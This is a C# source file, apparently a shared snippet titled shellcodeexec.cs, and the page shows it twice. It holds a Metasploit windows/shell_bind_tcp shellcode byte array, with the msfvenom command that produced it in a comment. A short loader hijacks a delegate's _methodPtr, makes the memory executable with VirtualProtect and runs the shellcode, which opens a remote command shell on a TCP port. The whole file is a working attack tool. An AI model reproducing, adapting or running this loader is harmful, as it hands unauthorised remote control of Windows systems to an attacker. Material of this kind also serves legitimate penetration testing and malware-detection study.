kost/shellcodeexec.cs

## shellcodeexec.cs
using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace ExecASMHardcoded
{
        class Program
        {
                [DllImport("kernel32.dll", SetLastError = true)]
                static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
                public delegate uint Ret1ArgDelegate(uint address);
                static uint PlaceHolder1(uint arg1) { return 0; }
                public static byte[] asmBytes = new byte[]
                {
                        //msfvenom -p windows/shell_bind_tcp -e none | sed -e ‘s/\"//ig’ | sed -e ‘s/+//ig’ | sed -e ‘s/\\x/,0x/ig’
                        0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,
                        0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,
                        0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,
                        0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,
                        0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,
                        0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,
                        0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,
                        0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
                        0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,
                        0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,
                        0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,
                        0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,
                        0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,
                        0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x89,0xc7,0x31,
                        0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,
                        0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,
                        0xd5,0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x89,0xc7,
                        0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3,
                        0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,
                        0x24,0x3c,0x01,0x01,0x8d,0x44,0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56,
                        0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,
                        0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,0x87,0x1d,0x60,
                        0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
                        0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,
                        0x6a,0x00,0x53,0xff,0xd5,
                };
                unsafe static void Main(string[] args)
                {
                        fixed (byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
                        {
                                // Get the FieldInfo for "_methodPtr"
                                Type delType = typeof(Delegate);
                                FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic |
                                BindingFlags.Instance);
                                // Set our delegate to our x86 code
                                Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
                                _methodPtr.SetValue(del, (IntPtr) startAddress);
                                //Disable protection
                                uint outOldProtection;
                                VirtualProtect((IntPtr) startAddress, (uint) asmBytes.Length, 0x40, out outOldProtection);
                                // Enjoy
                                uint n = (uint)0x00000001;
                                n = del(n);
                                Console.WriteLine("{0:x}", n);
                                Console.ReadKey();
                        }
                }
        }
}
	using System;
	using System.Reflection;
	using System.Runtime.InteropServices;
	namespace ExecASMHardcoded
	{
	class Program
	{
	[DllImport("kernel32.dll", SetLastError = true)]
	static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
	public delegate uint Ret1ArgDelegate(uint address);
	static uint PlaceHolder1(uint arg1) { return 0; }
	public static byte[] asmBytes = new byte[]
	{
	//msfvenom -p windows/shell_bind_tcp -e none \| sed -e ‘s/\"//ig’ \| sed -e ‘s/+//ig’ \| sed -e ‘s/\\x/,0x/ig’
	0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,
	0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,
	0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,
	0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,
	0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,
	0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,
	0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,
	0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
	0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,
	0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,
	0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,
	0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,
	0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,
	0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x89,0xc7,0x31,
	0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,
	0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,
	0xd5,0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x89,0xc7,
	0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3,
	0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,
	0x24,0x3c,0x01,0x01,0x8d,0x44,0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56,
	0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,
	0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,0x87,0x1d,0x60,
	0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
	0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,
	0x6a,0x00,0x53,0xff,0xd5,
	};
	unsafe static void Main(string[] args)
	{
	fixed (byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
	{
	// Get the FieldInfo for "_methodPtr"
	Type delType = typeof(Delegate);
	FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic \|
	BindingFlags.Instance);
	// Set our delegate to our x86 code
	Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
	_methodPtr.SetValue(del, (IntPtr) startAddress);
	//Disable protection
	uint outOldProtection;
	VirtualProtect((IntPtr) startAddress, (uint) asmBytes.Length, 0x40, out outOldProtection);
	// Enjoy
	uint n = (uint)0x00000001;
	n = del(n);
	Console.WriteLine("{0:x}", n);
	Console.ReadKey();
	}
	}
	}
	}